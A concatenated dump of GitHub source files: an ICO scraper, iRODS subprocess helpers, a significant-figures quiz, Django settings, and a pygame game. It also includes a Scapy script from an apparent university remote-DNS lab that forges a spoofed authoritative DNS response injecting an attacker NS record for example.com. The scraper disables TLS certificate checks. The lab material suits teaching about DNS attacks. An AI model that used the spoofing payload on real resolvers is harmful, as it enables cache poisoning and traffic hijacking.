\tsoft_cap =\"2342\",\n# \thard_cap =\"232323\",\n# \tpre_sale_date =\"234234\",\n# \ttoken_sale_date=\"324242\",\n# \ttotal_supply =\"2342442\",\n# \tcountry =\"\"\n# }\n\n\npp = pprint.PrettyPrinter(indent=4)\n\ndef get_icos():\n\trequests.packages.urllib3.disable_warnings()\n\n\tr = requests.get('https://icobench.com/icos?status=upcoming', verify=False)\n\n\tsoup = BeautifulSoup(r.text, 'html.parser')\n\n\tlinks =[]\n\tnames = soup.find_all(\"a\", \"name\")\n\tfor name in names:\n\t\tlinks.append(\"https://icobench.com\" + name['href'])\n\n\twhile soup.find(\"a\", \"next\"):\n\n\t\tlink = \"https://icobench.com\" + soup.find(\"a\", \"next\")['href']\n\t\tr = requests.get(link, verify=False)\n\t\tsoup = BeautifulSoup(r.text, 'html.parser')\n\t\tnames = soup.find_all(\"a\", \"name\")\n\t\tfor name in names:\n\t\t\tlinks.append(\"https://icobench.com\" + name['href'])\n\n\tupcoming = []\n\tfor link in links:\n\t\tr2 = requests.get(link, verify=False)\n\t\tsoup2 = BeautifulSoup(r2.text, 'html.parser')\n\t\tname = soup2.find(\"div\", \"name\").h1.text\n\t\tdesc = soup2.find(\"div\", \"ico_information\").p.text\n\t\tcategory = \"\"\n\t\tcategories = soup2.find('div', \"categories\").find_all(\"a\")\n\t\tfor categ in categories:\n\t\t\tcategory = category + categ.text + \" \"\n\n\t\tfinancial_data = soup2.find(\"div\", \"financial_data\")\n\t\tdate = \"\"\n\t\tif financial_data.find(\"small\"):\n\t\t\tdate = financial_data.find(\"small\").text\n\t\telse:\n\t\t\tdate = \"TBD\"\n\n\t\tsoftcap = \"\"\n\t\thardcap = \"\"\n\t\tcountry = \"\"\n\t\ttokentype =\"\"\n\t\tfor item in financial_data.find_all(\"div\", \"data_row\"):\n\n\t\t\tcols = item.find_all(\"div\", \"col_2\")\n\t\t\tif \"Soft cap\" in cols[0].text:\n\t\t\t\tsoftcap = cols[1].text\n\t\t\tif \t\"Hard cap\" in cols[0].text:\n\t\t\t\thardcap = cols[1].text\n\t\t\tif \"Country\" in cols[0].text:\n\t\t\t\tcountry = cols[1].text\n\t\t\tif \"Platform\" in cols[0].text:\n\t\t\t\ttokentype = cols[1].text\n\t\ttwitter =\"\"\n\t\tif soup2.find(\"a\", \"twitter\"):\n\t\t\ttwitter = soup2.find(\"a\", \"twitter\")['href']\n\t\tslack = \"\"\n\t\tif soup2.find(\"a\", \"slack\"):\n\t\t\tslack = soup2.find(\"a\", \"slack\")['href']\n\t\twebsite = \"\"\n\t\tif soup2.find(\"a\", \"www\"):\n\t\t\twebsite = soup2.find(\"a\", \"www\")['href']\n\t\ttelegram = \"\"\n\t\tif soup2.find(\"a\", \"telegram\"):\n\t\t\ttelegram = soup2.find(\"a\", \"telegram\")['href']\n\n\t\twhitepaper =\"\"\n\t\tfor tab in soup2.find(\"div\", \"tabs\").find_all(\"a\"):\n\t\t\tif \"White paper\" in tab.text:\n\t\t\t\twhitepaper = tab['href']\n\n\t\tteam = []\n\n\t\tmembers_all = soup2.find(id = \"team\").find_all('div', 'box')\n\t\tmembers = []\n\t\tif members_all:\n\t\t\tmembers = members_all[0].find_all(\"a\")\n\t\tif len(members_all) == 2:\n\t\t\tmembers = members_all[1].find_all(\"a\")\n\n\t\tfor member in members:\n\t\t\tif \"linkedin\" in member['href']:\n\t\t\t\tteam.append(member['href'])\n\t\t\n\t\ttemp = {}\n\t\ttemp[\"name\"] = name\n\t\ttemp[\"description\"]= desc\n\t\ttemp[\"category\"]= category\n\t\ttemp[\"website\"]= website\n\t\ttemp[\"whitepaper\"]= whitepaper\n\t\ttemp[\"twitter\"]=twitter\n\t\ttemp[\"telegram\"]=telegram\n\t\ttemp[\"slack\"]= slack\n\t\ttemp[\"team\"]=team\n\t\ttemp[\"amt_raised\"]=\"\"\n\t\ttemp[\"soft_cap\"]=softcap\n\t\ttemp[\"hard_cap\"]=hardcap\n\t\ttemp[\"pre_sale_date\"]=\"\"\n\t\ttemp[\"token_sale_date\"]=date\n\t\ttemp[\"total_supply\"]=\"\"\n\t\ttemp[\"country\"] =country\n\t\ttemp[\"tokentype\"] =tokentype\n\t\tupcoming.append(temp)\n\n\treturn [], upcoming","repo_name":"kunalchaudhary23/scraper","sub_path":"icobench.py","file_name":"icobench.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74111504359","text":"from __future__ import print_function\nimport copy\nimport errno\nimport logging\nimport pprint\nimport subprocess\nimport shlex\nimport sys\nimport time\n\nfrom . import six\n\nfrom .exceptions import IrodsError, IrodsWarning\n\ndef indent(*text, **kwargs):\n if 'indentation' in kwargs:\n indentation = kwargs['indentation']\n else:\n indentation = ' '\n return '\\n'.join([''.join([indentation, '\\n{0}'.format(indentation).join(lines.splitlines())]) for lines in text])\n\ndef safe_shlex_split_for_2_6(args):\n if not isinstance(args, str) and isinstance(args, six.text_type):\n args = args.encode('ascii')\n return shlex.split(args)\n\ndef communicate_and_log(p, args, input=None):\n l = logging.getLogger(__name__)\n out, err = [(None if t is None else t.decode('utf_8')) for t in p.communicate(input=(None if input is None else input.encode('ascii')))]\n message = ['Command %s returned with code %s.' % (args, p.returncode)]\n if input:\n message.append('stdin:\\n%s' % indent(input))\n if out:\n message.append('stdout:\\n%s' % indent(out))\n if err:\n message.append('stderr:\\n%s' % indent(err))\n l.debug('\\n'.join(message))\n return (out, err)\n\ndef execute_command_nonblocking(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, use_unsafe_shell=False, **kwargs):\n l = logging.getLogger(__name__)\n if not use_unsafe_shell and isinstance(args, six.string_types):\n args = safe_shlex_split_for_2_6(args)\n kwargs['stdout'] = stdout\n kwargs['stderr'] = stderr\n kwargs['shell'] = use_unsafe_shell\n if 'env' in kwargs:\n kwargs_without_env = copy.copy(kwargs)\n kwargs_without_env['env'] = 'HIDDEN'\n else:\n kwargs_without_env = kwargs\n l.debug('Calling %s with options:\\n%s', args, pprint.pformat(kwargs_without_env))\n try:\n return subprocess.Popen(args, **kwargs)\n except OSError as e:\n six.reraise(IrodsError,\n IrodsError('\\n'.join([\n 'Call to open process with {0} failed:'.format(\n args),\n indent(\n 'Could not find the requested executable \\'{0}\\'; '\n 'please ensure \\'{0}\\' is installed and in the path.'.format(\n args[0]))])),\n sys.exc_info()[2])\n\ndef execute_command_timeout(args, timeout=10, **kwargs):\n p = execute_command_nonblocking(args, **kwargs)\n start_time = time.time()\n while time.time() < start_time + timeout:\n if p.poll() is not None:\n out, err = communicate_and_log(p, args)\n check_command_return(args, out, err, p.returncode, **kwargs)\n break\n time.sleep(0.3)\n else:\n try:\n if p.poll() is None:\n p.kill()\n except OSError:\n pass\n raise IrodsError('The call {0} did not complete within {1} seconds.'.format(args, timeout))\n\ndef execute_command_permissive(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=None, **kwargs):\n if input is not None:\n if 'stdin' in kwargs and kwargs['stdin'] != subprocess.PIPE:\n raise IrodsError('\\'input\\' option is mutually exclusive with a \\'stdin\\' '\n 'option that is not equal to \\'subprocess.PIPE\\'.')\n kwargs['stdin'] = subprocess.PIPE\n p = execute_command_nonblocking(args, stdout=stdout, stderr=stderr, **kwargs)\n out, err = communicate_and_log(p, args, input)\n return (out, err, p.returncode)\n\ndef check_command_return(args, out, err, returncode, input=None, **kwargs):\n if returncode is not None and returncode != 0:\n if 'env' in kwargs:\n kwargs_without_env = copy.copy(kwargs)\n kwargs_without_env['env'] = 'HIDDEN'\n else:\n kwargs_without_env = kwargs\n deets = [\n 'Options passed to Popen:',\n indent(*['{0}: {1}'.format(k, v) for k, v in kwargs_without_env.items()]),\n 'Return code: {0}'.format(returncode)]\n if input:\n deets.extend(['Standard input:', indent(input)])\n if out:\n deets.extend(['Standard output:', indent(out)])\n if err:\n deets.extend(['Error output:', indent(err)])\n raise IrodsError('\\n'.join([\n 'Call to open process with {0} returned an error:'.format(\n args),\n indent(*deets)]))\n\ndef execute_command(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=None, **kwargs):\n out, err, returncode = execute_command_permissive(args, stdout=stdout, stderr=stderr, input=input, **kwargs)\n check_command_return(args, out, err, returncode, input=input, **kwargs)\n\n return (out, err)\n","repo_name":"irods/irods","sub_path":"scripts/irods/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":417,"dataset":"github-code","pt":"18"} +{"seq_id":"33276185356","text":"import random\nfrom StringSigFigs import Number, MakeNumber, RoundValue, CheckAnswer\nfrom CalcsWithSigFigs import subtractValues, multiplyValues, divideValues, findDecimalPlaces\n\noperators = ['+', '-', '*', '/']\n\ndef addValues(first,second):\n firstDP = findDecimalPlaces(first.value)\n secondDP = findDecimalPlaces(second.value)\n if firstDP == 0 or secondDP == 0:\n result = str(int(round((float(first.value)+float(second.value)),0)))\n return result\n elif firstDP > secondDP:\n result = str(round(float(first.value)+float(second.value),secondDP))\n resultDP = findDecimalPlaces(result)\n if resultDP < secondDP:\n result += \"0\"\n else:\n result = str(round(float(first.value)+float(second.value),firstDP))\n resultDP = findDecimalPlaces(result)\n if resultDP < firstDP:\n result += \"0\"\n return result\n\ndef subtractValues(first,second):\n firstDP = findDecimalPlaces(first.value)\n secondDP = findDecimalPlaces(second.value)\n if firstDP == 0 or secondDP == 0:\n result = str(int(round((float(first.value)-float(second.value)),0)))\n return result\n elif firstDP > secondDP:\n result = str(round(float(first.value)-float(second.value),secondDP))\n resultDP = findDecimalPlaces(result)\n if resultDP < secondDP:\n result += \"0\"\n else:\n result = str(round(float(first.value)-float(second.value),firstDP))\n resultDP = findDecimalPlaces(result)\n if resultDP < firstDP:\n result += \"0\"*(firstDP-resultDP)\n return result\n\ndef multiplyValues(value1, value2):\n sigFigs = min(value1.sigFigs, value2.sigFigs)\n product = str(float(value1.value)*float(value2.value))\n result = RoundValue(product, sigFigs)\n\n return result\n\ndef divideValues(value1, value2):\n sigFigs = min(value1.sigFigs, value2.sigFigs)\n quotient = str(float(value1.value)/float(value2.value))\n result = RoundValue(quotient, sigFigs)\n\n return result\n\ndef sfcalcs(value1, value2, operation):\n if operation == 0:\n result = addValues(value1,value2)\n answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n elif operation == 1 and value1.value > value2.value:\n result = subtractValues(value1,value2)\n answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n elif operation == 1 and value1.value < value2.value:\n result = subtractValues(value2,value1)\n answer = input(\"{0} {1} {2} = \".format(value2.value,operators[operation],value1.value))\n elif operation == 2:\n result = multiplyValues(value1,value2)\n answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n elif float(value1.value)/float(value2.value)<1e-4:\n result = divideValues(value2,value1)\n answer = input(\"{0} {1} {2} = \".format(value2.value,operators[operation],value1.value))\n else:\n result = divideValues(value1,value2)\n answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n\n if CheckAnswer(result, answer):\n return \"Correct! :-)\"\n else:\n return \"Sorry, the correct answer is {0}\".format(result)\n\ndef CheckRounding(result, sigFigs):\n if float(result)>=10 and sigFigs <= len(result):\n if result[sigFigs-1] == \"0\" and result.find('.') == -1:\n print(\"Rounding {0} to {1} sig figs is ambiguous. Changing to scientific notation...\".format(result,sigFigs))\n return True\n else:\n return False\n\ndef ApplySciNotation(result):\n if result.value[0] == \"0\":\n for x in range(2, len(result.value)):\n if result.value[x] != \"0\":\n startHere = x\n if result.sigFigs > 1:\n sciNot = result.value[x]+\".\"\n else:\n sciNot = result.value[x]\n break\n for digit in range(startHere+1,len(result.value)):\n sciNot += result.value[digit]\n sciNot += \"x10^-{0}\".format(startHere-1)\n elif result.value.find(\".\") >= 0:\n decimalIndex = result.value.find(\".\")\n sciNot = result.value[0]+\".\"\n for x in range(1,result.sigFigs+1):\n if result.value[x] != \".\":\n sciNot += result.value[x]\n sciNot += \"x10^{0}\".format(decimalIndex-1)\n else:\n sciNot = result.value[0]\n if result.sigFigs > 1:\n sciNot += \".\" \n for x in range(1,sigFigs):\n sciNot += result.value[x]\n sciNot += \"x10^{0}\".format(len(result.value)-1)\n return sciNot\n\nfor x in range(6):\n operation = random.randrange(4) #Randomly select +, -, * or / using integers 0 - 3, respectively.\n if operation <= 2: #For for +, - or *, create 2 values between 0.001 and 90 with 1 - 6 sig figs.\n value1 = Number(random.randrange(1,7),random.randrange(-3,2))\n value2 = Number(random.randrange(1,7),random.randrange(-3,2))\n else: #For for /, create 2 values between 0.01 and 900 with 1 - 6 sig figs.\n value1 = Number(random.randrange(1,7),random.randrange(-2,3))\n value2 = Number(random.randrange(1,7),random.randrange(-2,3))\n\n result = sfcalcs(value1, value2, operation)\n print(result)\n\n#TODO - 1) Add interactive tutorial pages. Perhaps with short videos?\n# 2) Develop measurement practice (interactive).\n# 3) Create a Number class and refactor sig fig code to use it instead of separate value, sigFig & power variables.\n# 4) Ignore #3. Using the Number class did not actually streamline the code much at all.\n# 5) For the sig fig practice pages, add an option for 'See correct answer'. It should appear when the user submits an incorrect response.","repo_name":"jimflores5/SigFigs","sub_path":"PracticeManips.py","file_name":"PracticeManips.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3894100762","text":"#!/usr/bin/env python\n\nfrom scapy.all import *\nconf.L3socket=L3RawSocket\n\nip = IP(src=\"199.43.135.53\", dst=\"10.0.2.5\")\nudp = UDP(sport=53, dport=33333)\n\ntarget_name = \"aaaaa.example.com\"\ntarget_domain = \"example.com\"\n\nqd_sec = DNSQR(qname=target_name)\nans_sec = DNSRR(rrname=target_name, type=\"A\",\n \t\trdata=\"1.2.3.4\", ttl=259200)\nns_sec = DNSRR(rrname=target_domain, type=\"NS\",\n \t\trdata=\"ns.dnslabattacker.net\", ttl=259200)\n\ndns = DNS(id=0xAAAA, \n \tqr=1, aa=1, rd=0, \n \tqdcount=1, nscount=1, ancount=1,\n \tqd=qd_sec, ns=ns_sec, an=ans_sec) \n\nspoof_pkt = ip/udp/dns\n#send(spoof_pkt)\n\nwith open(\"response.bin\", \"wb\") as f:\n f.write(bytes(spoof_pkt))\n","repo_name":"wuyuMk7/everything","sub_path":"courses/su/cse644/Lab6_RemoteDNS/code/scapy_response.py","file_name":"scapy_response.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33589823309","text":"\"\"\"Development settings and globals.\"\"\"\n\nimport os\nfrom os.path import join, normpath, dirname\nfrom common import *\n\n########## SECRET CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\nSECRET_KEY = r\"development+secret\"\n########## END SECRET CONFIGURATION\n\n########## DEBUG CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n########## END DEBUG CONFIGURATION\n\n########## ALLOWED HOSTS\nALLOWED_HOSTS = ['localhost']\n########## END ALLOWED HOSTS\n\n\n########## EMAIL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n########## END EMAIL CONFIGURATION\n\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nif 'DATABASE_URL' not in os.environ:\n db_dir = join(dirname(PROJECT_ROOT), 'database')\n os.environ['DATABASE_URL'] = 'sqlite:///' + db_dir + '/project.db'\n\nimport dj_database_url\nDATABASES = {\n 'default':\n dj_database_url.config()\n}\n########## END DATABASE CONFIGURATION\n","repo_name":"creimers/djangocms_scaffold","sub_path":"src/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32092956576","text":"import pygame, sys\nfrom pygame.locals import *\nfrom pygame import mixer\n\nmixer.init()\n\npygame.init()\n\nglobal greenhouse_effect\ngreenhouse_effect = 50\n\ndef collision_test(rect, tiles):\n hit_list = []\n for tile in tiles:\n if rect.colliderect(tile):\n hit_list.append(tile)\n\n return hit_list\n\ndef collisions_testing(player_rect, obj_list, greenhouse_effect):\n counter = -1\n obj_list_copy = obj_list[:]\n for i in range(len(obj_list_copy)-1):\n counter += 1\n if player_rect.colliderect(obj_list[i][0]):\n del obj_list[i]\n greenhouse_effect -= 5\n collect.set_volume(0.3)\n collect.play()\n\n return greenhouse_effect\n\ndef move(rect, movement, tiles):\n collision_types = {'top':False,'bottom':False,'right':False,'left':False}\n \n rect.x += movement[0]\n hit_list = collision_test(rect, tiles)\n for tile in hit_list:\n if movement[0] > 0:\n rect.right = tile.left\n collision_types['right'] = True\n elif movement[0] < 0:\n rect.left = tile.right\n collision_types['left'] = True\n \n rect.y += movement[1]\n hit_list = collision_test(rect,tiles)\n for tile in hit_list:\n if movement[1] > 0:\n rect.bottom = tile.top\n collision_types['bottom'] = True\n elif movement[1] < 0:\n rect.top = tile.bottom\n collision_types['top'] = True\n return rect, collision_types\n\ndef show_health(health):\n font = pygame.font.Font(\"freesansbold.ttf\", 15)\n colour = \"darkgreen\"\n if health < 50:\n colour = \"darkgreen\"\n if health > 50 and health < 76:\n colour = \"orange\"\n if health > 75:\n colour = \"red\"\n scoreSurf = font.render(\"Greenhouse Effect: %s percent\"%(health),True,colour)\n scoreRect = scoreSurf.get_rect()\n scoreRect.topleft = (10,10)\n display.blit(scoreSurf,scoreRect)\n\ndef showVictoryScreen():\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\n gameSurf = gameOverFont.render('YOU', True, \"purple\")\n overSurf = gameOverFont.render('WON!', True, \"red\")\n gameRect = gameSurf.get_rect()\n overRect = overSurf.get_rect()\n gameRect.midtop = (700 / 2, 370 / 2 - 150)\n overRect.midtop = (700 / 2, 370 / 2)\n\n screen.blit(gameSurf, gameRect)\n screen.blit(overSurf, overRect)\n\n win_sound.play()\n\n pygame.display.update()\n pygame.time.wait(5000)\n\ndef showGameOverScreen():\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\n gameSurf = gameOverFont.render('Game', True, \"purple\")\n overSurf = gameOverFont.render('Over', True, \"red\")\n gameRect = gameSurf.get_rect()\n overRect = overSurf.get_rect()\n gameRect.midtop = (700 / 2, 370 / 2 - 150)\n overRect.midtop = (700 / 2, 370 / 2)\n\n screen.blit(gameSurf, gameRect)\n screen.blit(overSurf, overRect)\n\n death_sound.play()\n\n pygame.display.update()\n pygame.time.wait(5000)\n \n\n\nWINDOW_SIZE = [700, 370]\n\nglobal clock\nclock = pygame.time.Clock()\n\nair_timer = 0\n\ntimer = 50\ngreenhouse_counter = 0\n\nscreen = pygame.display.set_mode(WINDOW_SIZE)\nglobal display\ndisplay = pygame.Surface((350, 185))\n\nrun = True\n\nplayer_gravity = 0\n\ntrue_scroll = [0,0]\n\nbackground_objects = [[0.25,[120,10,70,400]],[0.25,[280,30,40,400]],[0.5,[30,40,40,400]],[0.5,[130,90,100,400]],[0.5,[300,80,120,400]],[0.25,[420,50,120,200]],[0.5,[500,50,50,400]]]\n\nmoving_right = False\nmoving_left = False\n\ngrass_img = pygame.image.load(\"images/grass.png\")\ngrass_img = pygame.transform.scale(grass_img, (10,10))\n\ndirt_img = pygame.image.load(\"images/dirt.png\")\ndirt_img = pygame.transform.scale(dirt_img, (10,10))\n\nplayer_flip = False\n\nglobal death_sound, win_sound, collect\ndeath_sound = pygame.mixer.Sound(\"gameover.wav\")\nwin_sound = pygame.mixer.Sound(\"victory.wav\")\ncollect = pygame.mixer.Sound(\"score.wav\")\n\ngame_map = [[0,0,0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,40,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,2,2,1,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0,0,0,0],\n [0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,20,0,0,40,0,0,0,0,0,0,20,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,2,1,1,1,0,0,0,0],\n [0,0,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,0,0,0,2,1,1,1,1,1,1,1,1,2,2,2,2],\n [60,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [2,2,0,0,0,0,0,0,30,0,0,0,0,0,0,0,0,2,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,2,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,0,0,0,0,2,2,1,1,2,2,0,0,40,0,0,0,2,2,2,1,2,2,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,2,2,0,0,0,0],\n [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,20,0,1,1,1,1,1,0,0,0,0,0,0,2,1,1,1,1,1,1,0,0,0,0,0,2,2,2,0,2,2,2,2,2,2,2,2,2,2,1,1,0,0,0,0],\n [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,0,0,0,0,2,2,2,2,1,1,1,1,1,1,1,0,60,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0],\n [0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,2,2,2,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,2,2,2,2],\n [0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,0,0,0,1,60,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0],\n [0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0]]\n\nframe_number = 0\nanimated_num = 1\nanimation_type = \"run\"\n\nplayer_img = pygame.image.load('images/RUN_1.png')\nplayer_img = pygame.transform.scale(player_img, (12, 17))\nplayer_rect = pygame.Rect(0, 0, player_img.get_width(), player_img.get_height())\n\nobj_list = []\ny = 0\nfor row in game_map:\n x = 0\n for tile in row:\n if tile == 10:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t1\"])\n if tile == 20:\n image = pygame.image.load(\"trash_images/t2.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t2\"])\n if tile == 30:\n image = pygame.image.load(\"trash_images/t3.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t3\"])\n if tile == 40 or tile == 50:\n image = pygame.image.load(\"trash_images/t4.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t4\"])\n if tile == 60:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t1\"])\n x += 1\n y += 1\n\ntime_remaining = 30\ntimer = pygame.USEREVENT\npygame.time.set_timer(timer, 3000)\n\nwin = False\ngame_over = False\n\ndef start_screen():\n run = True\n pygame.mixer.music.load(\"home_screen_bg.mp3\")\n pygame.mixer.music.play(-1)\n show_controls = False\n count = 0\n while run:\n\n clock.tick(60)\n \n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n run = False\n if event.type ==QUIT:\n run = False\n if event.type == MOUSEBUTTONUP:\n x, y = pygame.mouse.get_pos()\n if x >= 250 and x <= 450:\n if y >= (370 / 2 + 120 - 75/2) and y <= (370 / 2 + 120 + 75/2):\n run = False\n if x >= 0 and x <= 150:\n if y >= 50 and y <= 125:\n if count == 1:\n count = 0\n show_controls = False\n elif count == 0:\n count = 1\n show_controls = True\n\n screen.fill(\"black\")\n intro_1 = \"You are a Climate Warrior who has to collect as many\"\n intro_2 = \"items in order to bring down the Greenhouse Effect to zero.\"\n intro_3 = \"The greenhouse effect is ever-increasing due to\"\n intro_4 = \"incessant land pollution by humans.\"\n\n \n titleFont = pygame.font.Font(\"freesansbold.ttf\",80)\n title = titleFont.render(\"CLIMATE\", True, \"white\")\n title1 = titleFont.render(\"WARRIOR\", True, \"white\")\n title_rect = title.get_rect()\n title_rect1 = title1.get_rect()\n title_rect.center = (700/2, 370 / 2 - 120)\n title_rect1.center = (700/2, 370 / 2 - 45)\n\n titleFont = pygame.font.Font(\"freesansbold.ttf\", 40)\n play = titleFont.render(\"PLAY\", True, \"white\")\n titleFont = pygame.font.Font(\"freesansbold.ttf\", 25)\n c = titleFont.render(\"Controls\", True, \"white\")\n\n titleFont = pygame.font.Font(\"freesansbold.ttf\",17)\n titleSurf1 = titleFont.render(intro_1, True, \"yellow\")\n titleSurf2 = titleFont.render(intro_2, True, \"yellow\")\n titleSurf3 = titleFont.render(intro_3, True, \"yellow\")\n titleSurf4 = titleFont.render(intro_4, True, \"yellow\")\n \n controls1 = titleFont.render(\"W/Space-bar to Jump\", True, \"green\")\n controls2 = titleFont.render(\"A to Run Left\", True, \"green\")\n controls3 = titleFont.render(\"D to Run Right\", True, \"green\")\n Rect1 = titleSurf1.get_rect()\n Rect2 = titleSurf2.get_rect()\n Rect3 = titleSurf3.get_rect()\n Rect4 = titleSurf4.get_rect()\n play_rect = play.get_rect()\n c_rect = c.get_rect()\n \n control_rect1 = controls1.get_rect()\n control_rect2 = controls2.get_rect()\n control_rect3 = controls3.get_rect()\n Rect1.center = (700 / 2, 370 / 2 +20)\n Rect2.center = (700 / 2, 370 / 2 +40)\n Rect3.center = (700 / 2, 370 / 2 + 60)\n Rect4.center = (700 / 2, 370 / 2 + 80)\n play_rect.center = (700 / 2, 370 / 2 +135)\n\n button = pygame.Rect(700 / 2, 370 / 2 + 120, 200, 75)\n button.center = (700 / 2, 370 / 2 + 135)\n button2 = pygame.Rect(700 / 2, 370 / 2 + 120, 175, 50)\n button2.center = (700 / 2, 370 / 2 + 135)\n\n button3 = pygame.Rect(700 / 2, 370 / 2 + 120, 150, 75)\n button3.center = (75, 50)\n button4 = pygame.Rect(700 / 2, 370 / 2 + 120, 125, 50)\n button4.center = (75, 50)\n c_rect.center = (75, 50)\n\n control_rect1.topleft = (10, 370 / 2 + 100)\n control_rect2.topleft = (10, 370 / 2 + 120)\n control_rect3.topleft = (10, 370 / 2 + 140)\n screen.blit(title, title_rect)\n screen.blit(title1, title_rect1)\n screen.blit(titleSurf1, Rect1)\n screen.blit(titleSurf2, Rect2)\n screen.blit(titleSurf3, Rect3)\n screen.blit(titleSurf4, Rect4)\n\n if show_controls == True:\n screen.blit(controls1, control_rect1)\n screen.blit(controls2, control_rect2)\n screen.blit(controls3, control_rect3)\n\n pygame.draw.rect(screen, (20, 61, 89), button)\n pygame.draw.rect(screen, (255, 186, 68), button2)\n screen.blit(play, play_rect)\n\n pygame.draw.rect(screen, (20, 61, 89), button3)\n pygame.draw.rect(screen, (255, 186, 68), button4)\n screen.blit(c, c_rect)\n \n pygame.display.update()\n \n clock.tick(60)\n \n pygame.mixer.music.fadeout(200)\n \n\nstart_screen()\n\npygame.mixer.music.load(\"game_bg.wav\")\npygame.mixer.music.play(-1)\n\nwhile run:\n if greenhouse_effect <= 0:\n win = True\n if greenhouse_effect >= 100 or player_rect.y > 150:\n game_over = True\n \n if game_over == True:\n pygame.mixer.music.fadeout(500)\n showGameOverScreen()\n pygame.quit()\n if win == True:\n pygame.mixer.music.fadeout(500)\n showVictoryScreen()\n pygame.quit()\n\n frame_number += 